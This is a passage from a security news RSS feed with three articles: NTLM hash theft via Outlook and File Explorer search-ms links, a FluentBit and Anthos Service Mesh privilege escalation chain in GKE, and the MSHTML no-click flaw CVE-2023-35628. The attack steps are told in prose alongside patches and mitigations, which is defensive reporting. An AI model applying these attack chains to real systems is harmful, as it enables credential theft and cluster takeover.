As File Explorer attempts to access the resource, it sends an NTLM v2 hash of Bob’s password for authentication. The attacker captures this hash and then uses various tools to crack the password offline. Once the password is obtained, the attacker can potentially access Bob’s computer or other resources within the company’s network.

This attack scenario demonstrates the potential vulnerability within Windows File Explorer when handling specially crafted search-ms URLs. It highlights the importance of being cautious with links, even those that seem to be internal file or search requests, and the need for robust security measures to protect against such NTLM hash theft attacks. Varonis Threat Labs also discovered vulnerabilities in Windows File Explorer’s process, explorer.exe, particularly in the “subquery” and “crumb” parameters of the URI handler “search-ms”.

The Windows File Explorer Exploits

  1. Using the “subquery” parameter: This method directs explorer.exe to connect to a remote SMB, leaking the NTLM v2 hash.
  2. Using the “crumb” parameter: Similar to the “subquery” exploit, this method also leads to the theft of the hashed password.

Microsoft’s Response

Microsoft has acknowledged the Outlook exploit as an important CVE-2023-35636 and released a patch on December 12, 2023. The vulnerabilities for WPA and Windows File Explorer were closed due to “moderate severity.”

Protecting Against NTLM v2 Attacks

To safeguard against these vulnerabilities, it is recommended to:

  • Enable SMB signing.
  • Block outgoing NTLM v2, especially on Windows 11 (25951) and later.
  • Prefer Kerberos authentication and block NTLM v2 at network and application levels.

Unpatched systems remain at risk, and it’s crucial to update and apply security measures to prevent potential exploits.

The post How to steal Windows password via Outlook email exploiting vulnerabilities in Windows Performance Analyzer (WPA) and File Explorer appeared first on Information Security Newspaper | Hacking News.

]]>
How to hack Google Kubernetes Engine (GKE)? Securing against GKE threats https://www.securitynewspaper.com/2023/12/28/how-to-hack-google-kubernetes-engine-gke-securing-against-gke-threats/ Thu, 28 Dec 2023 17:52:34 +0000 https://www.securitynewspaper.com/?p=27365 A recent investigation by Unit 42 of Palo Alto Networks has uncovered a dual privilege escalation chain in Google Kubernetes Engine (GKE). This vulnerability, stemming from specific configurations in GKE’sRead More →

The post How to hack Google Kubernetes Engine (GKE)? Securing against GKE threats appeared first on Information Security Newspaper | Hacking News.

]]>
A recent investigation by Unit 42 of Palo Alto Networks has uncovered a dual privilege escalation chain in Google Kubernetes Engine (GKE). This vulnerability, stemming from specific configurations in GKE’s logging agent FluentBit and Anthos Service Mesh (ASM), presents a significant security risk, potentially allowing attackers unauthorized access to Kubernetes clusters.

Kubernetes and GKE Overview: Kubernetes, the most widely adopted open-source container platform, is used for application deployment and management. GKE, Google’s Kubernetes Engine, offers additional features and capabilities, enhancing the deployment and management of Kubernetes clusters. However, the complexity of Kubernetes environments often makes them susceptible to security breaches due to misconfiguration and excessive privileges.

Issues in FluentBit and Anthos Service Mesh:

  • FluentBit: The default configuration of FluentBit, a lightweight log processor and forwarder, includes a volume mount that provides unnecessary access to the pod directory, including projected service account tokens.
  • Anthos Service Mesh (ASM): ASM’s Container Network Interface (CNI) DaemonSet retains excessive permissions post-installation, which can be exploited to create a new pod with elevated privileges.

FluentBit Flaw

The vulnerability described in the FluentBit container within a Kubernetes cluster is a significant issue. This vulnerability arises from the way FluentBit is configured to access volumes within the cluster. Let’s break down this vulnerability and its implications:

Understanding the Vulnerability

  1. FluentBit’s Volume Mount Configuration:
    • Misconfiguration: FluentBit is mounted with access to the /var/lib/kubelet/pods volume. This directory contains subdirectories for each pod running on a node.
    • Access to Sensitive Data: Within each pod’s directory, there is a kube-api-access volume that stores projected service account tokens. These tokens are used for authenticating with the Kubernetes API and are highly sensitive.
  2. Exploitation of the Misconfiguration:
    • Compromise of FluentBit: If an attacker gains access to the FluentBit container, they can exploit this misconfiguration.
    • Access to Tokens: The attacker can access any service account token of the pods on the same node.
    • Impersonation and Unauthorized Access: Using these tokens, the attacker can impersonate pods with varying levels of privileges, potentially gaining unauthorized access to the Kubernetes API server.
  3. Scope of the Attack:
    • Mapping the Cluster: The attacker could potentially list all running pods in the cluster (get pods command), allowing them to map the entire cluster.
    • Potential for Privilege Escalation: Depending on the permissions associated with the compromised tokens, the attacker could escalate their privileges within the cluster.
    • Harmful Actions: The attacker could perform various harmful actions, such as data theft, service disruption, or further exploitation of cluster resources.

The Role of the Sidecar Container

  • Functionality of Sidecar Container: In a typical Kubernetes setup, a sidecar container like FluentBit is used for log collection. It operates within the context of its pod, collecting, parsing, and forwarding logs from the main application container.
  • No Direct API Access Needed: The sidecar container generally doesn’t require direct access to the Kubernetes API server. It uses the Kubernetes infrastructure to access log files and container runtime metadata.

Anthos Service Mesh (ASM) Flaw

Imagine you are managing a Kubernetes cluster that utilizes Anthos Service Mesh (ASM) with Istio’s CNI plugin. The cluster hosts various applications critical to your organization.

Initial Setup

  • ASM Installation: During the setup of ASM, the Istio-cni-node DaemonSet is installed on the cluster.
  • DaemonSet’s Role: This DaemonSet is responsible for installing the Istio CNI plugin on each node. It also has a repair mode to handle misconfigured pods.

The Flaw

  • Excessive Permissions: After the installation, the Istio-cni-node DaemonSet retains high-level permissions, which are no longer necessary for its daily operation. This is where the flaw lies.

Exploitation Example

  1. Attacker’s Entry: An attacker, who already has limited access to the cluster (maybe as a low-privileged user), discovers the excessive permissions of the Istio-cni-node DaemonSet.
  2. Creating a Powerful Pod:
    • The attacker creates a new pod in the cluster, assigning it the same permissions as the Istio-cni-node DaemonSet. This is possible due to the excessive permissions that the DaemonSet still holds.
    • This new pod, which we can call a “powerful pod,” now has abilities far beyond what a regular pod should have.
  3. Misuse of Permissions:
    • The attacker uses the powerful pod to perform actions that are normally restricted, like accessing sensitive data or modifying critical configurations.
    • The pod could also manipulate other pods or services, disrupt operations, or even spread to other nodes, escalating the attack’s impact.
  4. Privilege Escalation:
    • Leveraging the capabilities of the powerful pod, the attacker escalates their privileges to that of a cluster administrator.
    • With admin-level access, they gain complete control over the Kubernetes cluster, leading to a severe security breach.

The Privilege Escalation Chain

The combination of these two issues can be exploited in a second-stage attack to gain full control of a Kubernetes cluster. The attack involves exploiting FluentBit permissions to read projected service account tokens and then leveraging ASM’s post-installation permissions to escalate privileges.

Let’s break down this attack chain to understand how an attacker could escalate privileges to become a cluster admin:

Step-by-Step Breakdown of the Attack Chain

1. Initial Access via FluentBit Container

  • Prerequisite: The attacker needs the Anthos Service Mesh feature to be enabled in the Kubernetes cluster.
  • Exploiting FluentBit: The attacker gains control of the FluentBit container. FluentBit, being a logging tool, often has extensive access within a cluster for log collection purposes.
  • Mounting Sensitive Volume: The attacker exploits FluentBit to mount the /var/lib/kubelet/pods volume, which contains the kube-api-access-<random-suffix> directory. This directory holds tokens from all pods on a node.

2. Token Harvesting Across the Cluster

  • Leveraging DaemonSet Nature of FluentBit: Since FluentBit runs as a DaemonSet (a pod on every node), the attacker replicates the initial compromise on each node.
  • Mapping the Cluster: By doing so, the attacker can access mounted tokens of other pods across the cluster.
  • Targeting Istio-Installer-container Token: Among these tokens, the attacker specifically looks for the Istio-Installer-container token.

3. Exploiting ASM CNI DaemonSet’s Permissions

  • Creating a New Pod: Utilizing the ASM CNI DaemonSet’s retained permissions, the attacker creates a new pod in the kube-system namespace.
  • Targeting a Powerful Service Account: The aim is to associate this pod with a service account that has extensive privileges.

4. Choosing the CRAC Service Account

  • Selecting CRAC: The ClusterRoleAggregationController (CRAC) service account is a prime target due to its ability to add permissions to cluster roles.
  • Updating Cluster Role: The attacker modifies the cluster role bound to the CRAC service account to gain full privileges.

5. Final Steps to Gain Cluster Admin Access

  • Mounting CRAC Token: The CRAC service account token is mounted onto the newly created pod.
  • Exploiting FluentBit Again: The attacker then exploits the FluentBit misconfiguration to extract the CRAC token from their pod.
  • Using CRAC Token: With the CRAC token, which has cluster admin permissions, the attacker can operate with full control over the Kubernetes cluster.

Google’s Response and Fixes:

Google addressed these configuration issues on December 14, 2023, with the release of GCP-2023-047. The fixes involved removing the /var/lib/kubelet/pod volume mount from the Fluent Bit pod and modifying ASM’s ClusterRole to remove excessive RBAC permissions.

Fixes and Mitigations Implemented

1. FluentBit Configuration Update

  • Issue: Initially, FluentBit had excessive access due to a hostPath volume mount of the /var/lib/kubelet/pods directory, which included access to sensitive service account tokens.
  • Fix: Google’s security team restricted FluentBit’s access, removing the unnecessary volume mount. This change ensures that FluentBit can only access the logs it requires for its operation, significantly reducing the risk of token compromise.

2. Anthos Service Mesh (ASM) Permissions Adjustment

  • Issue: ASM’s CNI DaemonSet had high privileges, as identified in an internal report.
  • Action Taken: Before the external report, Google was already working on reducing these permissions.
  • Fix: Google modified the ASM’s ClusterRole and restructured some functionalities to eliminate unnecessary RBAC permissions. This change addresses the excessive permissions that previously allowed for potential exploitation.

Impact of the Fixes

  • Security Hardening: These updates significantly enhance the security of both FluentBit and ASM within Kubernetes clusters, mitigating the specific vulnerabilities and strengthening the overall security posture against similar threats.
  • Preventing Privilege Escalation: By rectifying these issues, Google has effectively closed the attack vector that allowed for escalation to cluster admin privileges.
  • Proactive Vulnerability Management: Google’s response, especially their pre-emptive work on ASM’s permissions, highlights the importance of ongoing security assessments and proactive vulnerability management.

Broader Implications for Kubernetes Security

  • Continuous Monitoring and Auditing: Kubernetes environments should be continuously monitored and audited for misconfigurations and excessive permissions, especially for components with wide-ranging access like DaemonSets.
  • Principle of Least Privilege: This principle should be rigorously applied to all Kubernetes components, ensuring that each component has only the permissions necessary for its function.
  • Prompt Patching and Updates: Regularly updating Kubernetes and its associated components is crucial for maintaining security, as vulnerabilities can be discovered and exploited rapidly.

This discovery highlights the importance of vigilant security practices in cloud environments. Kubernetes, while powerful, can be vulnerable to sophisticated attacks due to misconfigurations and excessive privileges in system pods. The proactive response from Google and the detailed analysis by Palo Alto Networks underscore the ongoing need for robust security measures in cloud infrastructures.

The post How to hack Google Kubernetes Engine (GKE)? Securing against GKE threats appeared first on Information Security Newspaper | Hacking News.

]]>
Silent Email Attack CVE-2023-35628 : How to Hack Without an Email Click in Outlook https://www.securitynewspaper.com/2023/12/15/silent-email-attack-cve-2023-35628-how-to-hack-without-an-email-click-in-outlook/ Fri, 15 Dec 2023 18:16:06 +0000 https://www.securitynewspaper.com/?p=27359 CVE-2023-35628 is a critical remote code execution (RCE) vulnerability affecting the Microsoft Windows MSHTML platform, with a Common Vulnerability Scoring System (CVSS) score of 8.1, indicating a high level ofRead More →

The post Silent Email Attack CVE-2023-35628 : How to Hack Without an Email Click in Outlook appeared first on Information Security Newspaper | Hacking News.

]]>
CVE-2023-35628 is a critical remote code execution (RCE) vulnerability affecting the Microsoft Windows MSHTML platform, with a Common Vulnerability Scoring System (CVSS) score of 8.1, indicating a high level of risk. This flaw is particularly concerning because it can be exploited without any interaction from the user. The vulnerability can be triggered when Microsoft Outlook retrieves and processes a specially crafted email, even before the email is viewed in the Outlook Preview Pane. This makes it a particularly insidious threat, as users may be unaware of the lurking danger​​​​​​.

The nature of CVE-2023-35628 allows a remote, unauthenticated attacker to execute arbitrary code on the victim’s system. The exploit can be initiated by sending a specially crafted email, and it has been noted that ransomware gangs and other malicious entities are likely to find this vulnerability an attractive target. Although the exploit code maturity for CVE-2023-35628 is currently unproven, which means there might not yet be a reliable method for exploiting this vulnerability in the wild, the potential for remote code execution makes it a critical issue for all Windows users​​.

MSHTML platform

The vulnerability in the MSHTML platform, specifically CVE-2023-35628, can be attributed to several factors that are commonly found in software vulnerabilities:

  1. Parsing and Rendering of HTML Content: MSHTML, being a component used for parsing and rendering HTML content in applications like Microsoft Outlook, processes a large amount of untrusted input. This input, which often includes complex HTML and scripting content, can contain flaws or unexpected sequences that are not properly handled by the software.
  2. Memory Management Issues: Vulnerabilities often arise due to memory management issues such as buffer overflows, use-after-free errors, or other similar problems. These issues can occur when the software does not correctly allocate, manage, or free memory when processing HTML content. Attackers can exploit these weaknesses to execute arbitrary code.
  3. Insufficient Input Validation: Software vulnerabilities can also stem from insufficient input validation. If MSHTML does not properly validate or sanitize the HTML content it processes, malicious input could be used to trigger an exploit. This could include specially crafted scripts or malformed HTML structures designed to take advantage of the parser’s weaknesses.
  4. Complexity of Web Standards: The complexity of modern web standards can also contribute to vulnerabilities. As standards evolve and become more complex, it becomes increasingly challenging to ensure that every aspect of the parsing and rendering process is secure against all potential attack vectors.
  5. Integration with Email Clients: The integration of MSHTML with email clients like Outlook adds another layer of complexity. Emails are a common vector for delivering malicious content, and the automatic processing of emails (including the rendering of HTML content) can make it easier for attackers to exploit vulnerabilities without direct interaction from the user.

The No-Click Exploit

An exploit for the CVE-2023-35628 vulnerability in the Windows MSHTML platform would typically involve a few key steps, tailored to leverage the specific nature of this flaw. Here’s a generalized overview of how such an exploit could work:

  1. Crafting a Malicious Email: The attacker starts by creating a specially crafted email. This email would contain malicious code or a payload designed to exploit the vulnerability in the MSHTML platform. The precise nature of this code depends on the specifics of the vulnerability and would be tailored to trigger the flaw in MSHTML.
  2. Email Delivery and Automatic Processing: The crafted email is then sent to the target. In the case of CVE-2023-35628, the critical aspect is that the vulnerability is triggered when Microsoft Outlook retrieves and processes the email. This processing happens automatically, often before the email is even displayed in the Outlook Preview Pane.
  3. Remote Code Execution: Upon processing the malicious email, the exploit code is executed. This code execution occurs within the context of the MSHTML platform, which is a key component used by Outlook for rendering HTML content in emails.
  4. Taking Control or Damaging the System: Once the code is executed, it can perform various malicious activities. This could range from taking control of the user’s system, stealing sensitive information, installing malware, or performing other harmful actions. The extent of the damage or control depends on the nature of the payload and the permissions available to the MSHTML process.

Memory shaping is an advanced exploitation technique often used in sophisticated cyber attacks, particularly those involving complex software systems and secure environments. It’s a method used by attackers to manipulate the layout or state of memory in a target application to facilitate the exploitation of vulnerabilities. Memory shaping can be a part of exploiting vulnerabilities like buffer overflows, use-after-free errors, or other memory corruption issues.

Here’s a simplified example to illustrate how memory shaping and its exploitation might work:

  1. Identifying a Vulnerability: First, the attacker finds a vulnerability in the target application that can be exploited to corrupt memory. For instance, this could be a buffer overflow, where the application fails to check the length of input, allowing an attacker to write more data to a buffer than it can hold.
  2. Analyzing Memory Layout: The attacker then studies the application’s memory layout to understand how data is stored and managed. This involves identifying where in memory different types of data are located and how they are accessed by the application.
  3. Memory Shaping: Once the attacker has a good understanding of the memory layout, they begin the process of memory shaping. This involves crafting inputs or actions that modify the application’s memory in a controlled way. For example, they might allocate and free memory in a specific pattern to arrange chunks of memory in a desired layout.
  4. Exploiting the Vulnerability: With the memory shaped to their advantage, the attacker then exploits the identified vulnerability. Using the buffer overflow example, they might overflow a buffer with data that includes malicious code (the payload) and carefully calculated addresses or commands that redirect the application’s execution flow to the payload.
  5. Executing Arbitrary Code: If successful, the exploit allows the attacker’s code to be executed with the privileges of the target application. This could lead to various malicious outcomes, such as data theft, installation of malware, or gaining control over the system.

It’s important to note that memory shaping is a complex and technical process that requires in-depth knowledge of both the target application and general exploitation techniques. It’s typically used in scenarios where standard exploitation methods are not effective, often due to security measures like Address Space Layout Randomization (ASLR) or other protections.

Due to the complexity and potential for misuse, specific exploit code or detailed methodologies for memory shaping are not shared publicly. The goal of cybersecurity research in this area is to understand and mitigate such advanced threats, ensuring software and systems are secure against potential attacks.

It’s important to note that the complexity of the exploit for CVE-2023-35628 is considered high. It requires specific knowledge and techniques, particularly related to memory shaping, to successfully exploit the vulnerability. This complexity might limit the exploitation to more skilled attackers.

The attack complexity is considered high due to the reliance on complex memory-shaping techniques to successfully exploit the vulnerability. Despite this complexity, the high impact of the vulnerability necessitates prompt attention and action. Microsoft has addressed this flaw in their December 2023 Patch Tuesday updates, recommending users to update their systems as a preventative measure​​.

It’s important to note that CVE-2023-35628 is just one of several vulnerabilities addressed in the December 2023 Patch Tuesday updates. Other notable vulnerabilities include CVE-2023-35630 and CVE-2023-35641, which are remote code execution vulnerabilities affecting Microsoft Internet Connection Sharing (ICS) with a CVSS score of 8.8, and a critical spoofing vulnerability in Microsoft Power Platform Connector (CVE-2023-36019) with a CVSS score of 9.6​​.

Mitigation & Scope

The CVE-2023-35628 vulnerability, which is a critical remote code execution flaw in the Windows MSHTML platform, affects a range of Microsoft products, including Office 365 and on-premises versions. This vulnerability is significant due to its potential to allow exploitation as soon as Outlook retrieves and processes a specially crafted malicious email, even before the user interacts with the email. This means that exploitation could occur without any action from the user, not even requiring the Preview Pane in Outlook.

In terms of impact on Office 365 and on-premises environments, it’s important to note that the MSHTML proprietary browser engine, which is the component affected by this vulnerability, is used by Outlook among other applications to render HTML content. The fact that this engine remains installed within Windows, regardless of the status of Internet Explorer 11, means that systems where Internet Explorer 11 has been fully disabled are still vulnerable until patched.

For addressing this vulnerability, Microsoft released patches as part of their December 2023 Patch Tuesday. These patches are essential for mitigating the risk posed by this vulnerability and are available for various versions of Windows and related software components. Given the critical nature of this vulnerability and its potential impact on confidentiality, integrity, and availability, it’s strongly recommended for users and administrators of both Office 365 and on-premises environments to apply these updates promptly.

The December 2023 Patch Tuesday from Microsoft addressed a total of 34 vulnerabilities, including this critical RCE vulnerability in MSHTML. It’s noteworthy that there were no security patches for Exchange, SharePoint, Visual Studio/.NET, or SQL Server in this particular update cycle.

The details about the patches and the specific versions they apply to can be found in Microsoft’s security bulletins and support documentation. For users and administrators, it is crucial to review these resources and ensure that all applicable security updates are applied to protect against potential exploits of this vulnerability​

Given the severity and the ease with which this vulnerability can be exploited, it is crucial for Windows users, particularly those using Microsoft Outlook, to ensure their systems are updated with the latest security patches provided by Microsoft. Regular review of patching strategies and overall cybersecurity methods is advisable to maintain a robust security posture.

The post Silent Email Attack CVE-2023-35628 : How to Hack Without an Email Click in Outlook appeared first on Information Security Newspaper | Hacking News.

]]>